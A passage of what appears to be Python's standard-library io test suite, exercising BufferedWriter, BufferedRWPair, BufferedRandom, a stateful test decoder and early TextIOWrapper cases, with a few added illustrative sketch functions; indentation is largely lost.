self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with self.open(os_helper.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
                # After the write, write_pos and write_end are set to 0
                f.read(1)
                # The read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(os_helper.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
@threading_helper.requires_working_threading()
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
        # The Python version has __del__, so it ends up in gc.garbage instead.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
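
# Illustrative sketch (not part of the original test suite): BufferedRWPair
# glues an independent reader and writer into one object.  Reads come from the
# first argument, writes go to the second, and the pair is never seekable,
# which is exactly what the BufferedRWPairTest cases above assert.
def _buffered_rw_pair_sketch():
    import io
    reader = io.BytesIO(b"abcdef")
    writer = io.BytesIO()
    pair = io.BufferedRWPair(reader, writer)
    assert pair.read(3) == b"abc"     # delegated to the reader side
    pair.write(b"xyz")                # buffered on the writer side
    pair.flush()
    assert writer.getvalue() == b"xyz"
    assert not pair.seekable()        # BufferedRWPair is never seekable
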
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point to test it over
# a writable stream.
test_truncate_on_read_only = None
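
# Illustrative sketch (not part of the original test suite): BufferedRandom
# provides buffered read *and* write access to a single seekable raw stream,
# which is why the class above disables the inherited tests by assigning None
# (the unittest loader only collects callable test attributes).  The values
# below mirror test_seek_and_tell.
def _buffered_random_sketch():
    import io
    raw = io.BytesIO(b"asdfghjkl")
    rw = io.BufferedRandom(raw)
    assert rw.read(4) == b"asdf"      # readahead fills the internal buffer
    rw.write(b"123f")                 # overwrites bytes 4..7 in place
    rw.seek(0)
    assert rw.read() == b"asdf123fl"
    rw.flush()
    assert raw.getvalue() == b"asdf123fl"
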
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
    @skip_if_sanitizer(memory=True, address=True, reason="sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
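
# Illustrative sketch (not part of the original test suite): how the word
# protocol described in StatefulIncrementalDecoder's docstring plays out.  The
# expected outputs mirror the first StatefulIncrementalDecoderTest.test_cases
# entries below.
def _stateful_decoder_sketch():
    d = StatefulIncrementalDecoder()
    # I=1, O=1: every input byte becomes a one-character word plus a period.
    assert d.decode(b'abcd', final=False) == 'a.b.c.d.'
    d = StatefulIncrementalDecoder()
    # The 'o' and 'i' words set O=0 and I=0 (variable-length, period-terminated
    # words); final=True forces the buffered word out.
    assert d.decode(b'oiabcd', final=True) == 'abcd.'
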
# bpo-41919: This method is separated from StatefulIncrementalDecoder to avoid a resource leak
# when registering codecs and cleanup functions.
def lookupTestDecoder(name):
if StatefulIncrementalDecoder.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=StatefulIncrementalDecoder)
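
# Illustrative sketch (not part of the original test suite): how the tests wire
# the decoder above into the codec machinery.  TextIOWrapperTest.setUp below
# registers lookupTestDecoder and schedules codecs.unregister as a cleanup, and
# the search function only answers once codecEnabled is switched on.
def _test_decoder_registration_sketch():
    import codecs
    codecs.register(lookupTestDecoder)
    try:
        StatefulIncrementalDecoder.codecEnabled = True
        info = codecs.lookup('test_decoder')   # resolved via lookupTestDecoder
        assert info.name == 'test_decoder'
    finally:
        StatefulIncrementalDecoder.codecEnabled = False
        codecs.unregister(lookupTestDecoder)
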
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
os_helper.unlink(os_helper.TESTFN)
codecs.register(lookupTestDecoder)
self.addCleanup(codecs.unregister, lookupTestDecoder)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, encoding="utf-8", newline=42)
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO(), encoding="utf-8")
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b, encoding="ascii")
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw, encoding="utf-8")
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
